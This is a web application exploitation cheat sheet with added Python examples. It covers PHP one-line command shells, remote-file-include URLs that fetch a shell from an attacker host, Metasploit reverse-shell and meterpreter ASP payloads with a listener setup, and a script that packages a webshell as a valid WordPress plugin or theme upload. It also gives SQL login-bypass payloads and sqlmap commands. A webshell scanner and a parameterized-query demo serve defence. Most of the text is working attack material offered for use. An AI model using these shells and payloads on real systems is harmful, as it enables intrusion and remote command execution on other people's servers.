WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
or, if the command should also be accepted from a POST body or cookie (so it need not appear in the URL or the access log):
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI). This only works when allow_url_include=On in php.ini (it has been Off by default since PHP 5.2); the cmd parameter is visible to the included script because $_GET is shared:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null bytes (%00) may also assist in some cases, e.g. when the include appends a fixed suffix such as ".php" to the parameter; PHP versions before 5.3.4 stop reading the path at the null byte:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php%00
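The one-liner shells above are exactly what a defender should be hunting for on a compromised webroot. The following is an added example (not from the original cheat sheet) of a small signature scanner that flags PHP files where an execution sink is fed directly by a request superglobal, eval() of a decoded payload, or any .php file under an upload directory. The sample webroot and the sink/source lists are constructed for the example and are not exhaustive; a real scanner would also follow indirect data flow such as $c=$_GET['c']; system($c);.

```python
import re

# Execution sinks and request superglobals (assumed list for this example).
SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# sink( ... $_GET[...] ) with no nested parentheses between sink and source;
# catches system($_GET['cmd']) as well as shell_exec("ls " . $_POST['d']).
DIRECT = re.compile(SINKS + r"\s*\(\s*[^()]*?" + SOURCES, re.I)
# eval(base64_decode(...)) / eval(gzinflate(...)): the usual obfuscated dropper.
OBFUSCATED = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I
)


def classify(path: str, src: str) -> list[str]:
    """Return the reasons a file looks like a webshell (empty list = clean)."""
    findings = []
    if DIRECT.search(src):
        findings.append("request-controlled exec sink")
    if OBFUSCATED.search(src):
        findings.append("eval of decoded payload")
    # PHP under a media upload directory should never exist, whatever it contains.
    if path.endswith(".php") and "/uploads/" in "/" + path:
        findings.append("php file in upload directory")
    return findings


def scan(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan {relative_path: source} and return only the flagged files."""
    return {p: f for p, s in files.items() if (f := classify(p, s))}


# Constructed sample webroot (strings, not real files): the page's one-liner
# shells, an obfuscated dropper, and a benign file calling system() with a constant.
SAMPLE_WEBROOT = {
    "cmd.php": "<?php system($_GET['cmd']) ?>",
    "wp-content/plugins/wpx/cmd.php": "<?php system($_REQUEST['cmd']); ?>",
    "wp-content/uploads/2012/04/image.php": "<?php eval(base64_decode($_POST['p'])); ?>",
    "cron.php": "<?php system('/usr/bin/php /var/www/app/jobs.php'); ?>",
    "index.php": "<?php include 'header.php'; echo 'hello'; ?>",
}

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_WEBROOT).items():
        print(f"{path}: {', '.join(reasons)}")
```

Run over a real tree by walking the webroot and feeding each file's contents to scan(); the benign cron.php is not flagged because its argument is a constant, which is the distinction a plain grep for "system(" misses.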
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
Note: msfpayload and msfencode were removed from Metasploit in 2015; the msfvenom equivalent of the meterpreter line is
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> -f asp -o <filename>.asp
------
attacker msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
exploit
Specific Web applications
Joomla
Joomla default database configuration filename
<web-app-path>/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer -url <target-and-joomla-path> -type joomla
WordPress
WordPress default database configuration filename
<web-app-path>
WordPress default login page
<web-app-path>/wp-login.php
WordPress plugins
<web-app-path>/wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path> --enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress
Newer WP: administrators can upload plugins and themes as zip files through the dashboard, so a zip containing a webshell gives command execution:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx.zip wpx
upload wpx.zip via the web interface (Plugins > Add New > Upload Plugin) as a plugin
Command execution access is via:
<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)>
Caveats: WordPress rejects a plugin zip with no .php file carrying a "Plugin Name:" header comment ("No valid plugins were found"), and a theme zip with no style.css carrying a "Theme Name:" header plus an index.php, so put a stub header file next to cmd.php. If the package is uploaded as a theme instead (Appearance > Themes > Add New > Upload Theme), the shell lands under <web-app-path>/wp-content/themes/wpx/cmd.php. The plugin or theme does not need to be activated: cmd.php is served directly by the web server.
Older WP: Webshells can be added by editing existing files/themes via the web interface (Appearance > Editor) or by enabling file upload and permitting the valid file extension (e.g. .php).
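The shell-command procedure above only works when the zip passes WordPress's package validation, which the bare mkdir/zip sequence does not. The following is an added example (not from the original cheat sheet) that builds the package with the required stub header, as either a plugin or a theme, and reports where cmd.php ends up for each upload type. The slug "wpx", the target URL and the header texts are assumptions for the example; the shell is the page's own one-liner.

```python
import io
import zipfile

# The page's one-line shell, dropped inside the package.
CMD_SHELL = "<?php system($_GET['cmd']) ?>\n"

# Minimal headers WordPress checks when validating an uploaded package
# (assumed minimal forms; Plugin Name / Theme Name are the mandatory fields).
PLUGIN_STUB = "<?php\n/*\nPlugin Name: {slug}\n*/\n"
THEME_STYLE = "/*\nTheme Name: {slug}\n*/\n"
THEME_INDEX = "<?php\n// intentionally empty: WordPress requires index.php in a theme\n"


def build_package(slug: str = "wpx", kind: str = "plugin") -> bytes:
    """Return the bytes of a zip WordPress will accept as a plugin or theme."""
    if kind not in ("plugin", "theme"):
        raise ValueError("kind must be 'plugin' or 'theme'")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if kind == "plugin":
            zf.writestr(f"{slug}/{slug}.php", PLUGIN_STUB.format(slug=slug))
        else:
            zf.writestr(f"{slug}/style.css", THEME_STYLE.format(slug=slug))
            zf.writestr(f"{slug}/index.php", THEME_INDEX)
        zf.writestr(f"{slug}/cmd.php", CMD_SHELL)
    return buf.getvalue()


def members(blob: bytes) -> list[str]:
    """List the archive entries, sorted, for inspection."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return sorted(zf.namelist())


def shell_url(webroot: str, slug: str, kind: str) -> str:
    """Where cmd.php is reachable after installation; the folder depends on the upload type."""
    folder = "plugins" if kind == "plugin" else "themes"
    return f"{webroot}/wp-content/{folder}/{slug}/cmd.php?cmd="


if __name__ == "__main__":
    for kind in ("plugin", "theme"):
        blob = build_package("wpx", kind)
        with open(f"wpx-{kind}.zip", "wb") as fh:
            fh.write(blob)
        print(kind, members(blob), shell_url("http://<target>/blog", "wpx", kind))
```

The top-level folder inside the zip becomes the plugin or theme directory name, which is why the URL path uses the slug rather than the zip filename.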
Cacti
Cacti default database configuration filename
<web-app-path>/include/config.php
DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path>/inc/mysql.php
Drupal
Drupal default database configuration filename
<web-app-path>/sites/default/settings.php
Scanning Drupal for modules and versions
/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal
Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
SQL Terminators/Comments
MSSQL and MySQL:
<sql injected command>;--
(in MySQL the -- comment only starts if it is followed by a space or tab, so send "-- " with a trailing space)
MySQL:
<sql injected command>;#
Login Pages Basic SQL injection (payload in the username field; the comment discards the rest of the WHERE clause, including the password check)
MSSQL (the usual stack behind IIS/ASP):
' OR 1=1;--
MySQL:
' OR 1=1#
Without a comment, e.g. ' OR '1'='1, the rest of the clause still runs and AND binds tighter than OR, so the payload must go in the last field or in every field to bypass the login.
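The terminator and login-bypass payloads above are easiest to understand against a running query. The following is an added example (not from the original cheat sheet) using Python's built-in sqlite3 so it runs offline: a deliberately vulnerable login that concatenates input into the query, the parameterized version beside it, and a helper that classifies a payload as bypass, denied or syntax error. It shows why the `--` payload works, why `#` is MySQL-only (SQLite, like MSSQL, rejects it), and why `' OR '1'='1` in the username alone fails on operator precedence. The users table and credentials are constructed for the example; note that SQLite, unlike MySQL, does not require a space after `--`.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table for the demo.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def login_vulnerable(con: sqlite3.Connection, user: str, pw: str):
    # The anti-pattern: user input concatenated straight into the SQL text.
    query = f"SELECT name FROM users WHERE name='{user}' AND pw='{pw}'"
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, user: str, pw: str):
    # Parameter binding: the payload is bound as a string value and never parsed as SQL.
    row = con.execute(
        "SELECT name FROM users WHERE name=? AND pw=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


def try_payload(con: sqlite3.Connection, user: str, pw: str, login=login_vulnerable) -> str:
    """'bypass' if a user is returned, 'denied' if not, 'error' if the SQL fails to parse."""
    try:
        return "bypass" if login(con, user, pw) else "denied"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("' OR 1=1--", "x"),             # comment drops the password check
        ("' OR 1=1#", "x"),              # '#' is a MySQL comment only
        ("' OR '1'='1", "x"),            # AND binds tighter than OR: still denied
        ("' OR '1'='1", "' OR '1'='1"),  # same payload in both fields: bypass
    ]
    for u, p in cases:
        print(f"{u!r:22} {p!r:14} vulnerable={try_payload(db, u, p)} safe={try_payload(db, u, p, login_safe)}")
```

The "error" outcome is itself a fingerprint: a payload that errors on one comment style and succeeds on another tells you which database dialect is behind the form.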
SQLMap commands
cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba
Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html